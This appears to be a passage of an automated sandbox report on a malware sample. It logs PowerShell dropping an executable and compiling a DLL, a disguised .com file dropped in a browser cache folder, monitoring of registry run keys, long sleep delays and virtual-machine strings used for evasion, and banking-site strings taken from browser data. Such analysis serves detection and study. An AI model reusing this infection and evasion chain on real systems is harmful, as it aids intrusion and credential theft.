    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Google Drive.lnk.20.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.20.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.20.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.20.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.20.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.20.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.pdbhP source: powershell.exe, 00000000.00000002.2133357506.00000241021C0000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.pdb source: powershell.exe, 00000000.00000002.2133357506.00000241021C0000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_004062FC
    Source: hyf04rot.rhn.exe.0.drStatic PE information: real checksum: 0x11ca3d should be: 0x124aa4
    Source: l2xn2zg1.dll.3.drStatic PE information: real checksum: 0x0 should be: 0xa846
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E90954 push E95AB7D0h; ret 0_2_00007FF848E909C9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E97955 push ebx; retf 0_2_00007FF848E9796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E94278 push E95C9962h; ret 0_2_00007FF848E94299
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F62349 push 8B485F91h; iretd 0_2_00007FF848F6234E
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F61030 pushad ; ret 0_2_00007FF848F61031
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_3_00804D9E pushad ; retn 007Dh5_3_00804DA9
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_3_007FB524 push ebp; iretd 5_3_007FB525
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_3_007FB50E push ebp; iretd 5_3_007FB50F
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_3_007FAE0C pushad ; retn 007Dh5_3_007FAE2D
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_3_007FB0E4 push ebp; iretd 5_3_007FB0E5
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_3_007FB0CE push ebp; iretd 5_3_007FB0CF
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_3_00804D4E pushad ; retn 007Dh5_3_00804D59

    Persistence and Installation Behavior

    barindex
    Drops PE files with a suspicious file extension
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeJump to dropped file
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.dllJump to dropped file

    Boot Survival

    barindex
    Monitors registry run keys for changes
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4813Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5061Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3172Thread sleep time: -18446744073709540s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com TID: 1124Thread sleep count: 66 > 30Jump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 6476Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\SysWOW64\timeout.exe TID: 2408Thread sleep count: 86 > 30
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004062D5 FindFirstFileW,FindClose,5_2_004062D5
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_00402E18 FindFirstFileW,5_2_00402E18
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406C9B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
    Source: Web Data.31.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
    Source: Web Data.31.drBinary or memory string: discord.comVMware20,11696428655f
    Source: Web Data.31.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
    Source: Web Data.31.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: global block list test formVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
    Source: svchost.exe, 00000015.00000002.3264787606.00000239C3613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3268296823.00000239C8C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: msedge.exe, 00000019.00000003.2604195308.00007A6400328000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
    Source: Web Data.31.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
    Source: Web Data.31.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
    Source: Web Data.31.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
    Source: Web Data.31.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
    Source: svchost.exe, 00000015.00000002.3264864488.00000239C362B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
    Source: Web Data.31.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
    Source: Web Data.31.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
